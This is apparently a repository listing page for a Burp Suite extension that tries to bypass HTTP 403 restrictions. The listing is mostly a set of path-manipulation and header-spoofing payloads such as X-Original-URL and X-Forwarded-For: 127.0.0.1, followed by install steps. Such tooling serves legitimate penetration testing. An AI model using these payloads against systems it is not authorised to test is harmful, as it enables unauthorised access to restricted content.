sting8k/BurpSuite_403Bypasser sting8k/BurpSuite_403Bypasser

  • Stars
    star
    1,492
  • Rank 31,473 (Top 0.7 %)
  • Language
    Python
  • Created about 4 years ago
  • Updated over 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
sting8k/BurpSuite_403Bypasser
github

sting8k

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Burpsuite Extension to bypass 403 restricted directory

403Bypasser

An burpsuite extension to bypass 403 restricted directory. By using PassiveScan (default enabled), each 403 request will be automatically scanned by this extension, so just add to burpsuite and enjoy.

Payloads: $1: HOSTNAME $2: PATH

$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2" 
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" 
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

Thanks @lohubi for contributing many payloads.

Installation

BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish

Screenshot

References:

More Repositories

1

gowc

GoWC - Wildcard cleaner for MassDNS
Go
21
star
2

PasswordPermutator

A tool to generate password from words that user provide.
Python
4
star
3

sting8k.github.io

HTML
3
star
4

aww

2
star
5

windows-boost

Windows boost tricks
2
star